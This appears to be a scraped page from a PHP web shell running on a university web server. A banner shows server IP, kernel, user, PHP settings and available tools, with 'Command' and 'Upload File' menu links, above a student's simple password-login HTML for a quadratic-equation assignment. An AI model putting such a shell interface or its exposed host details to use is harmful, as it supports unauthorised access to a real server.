Server IP : 172.16.15.8 / Your IP : 3.133.151.90 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/kvtillotson/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- assig2two.html - Assignment 2 part 2 - the Quadratic Equation login Page - Kristin Tillotson --> <font color=green> <CENTER> <H2> Quadratic Equation Login </H2> <HR> </font> <FORM action=assig2twoQuad.php method=post> Enter the password: <INPUT type=password name=passwd> <P> <INPUT type=submit value=submit> <INPUT type=reset value=reset> </FORM> </CENTER> <A HREF=index.html> Course Home </A> | <A HREF=assig2.html> Assignment 2 </A>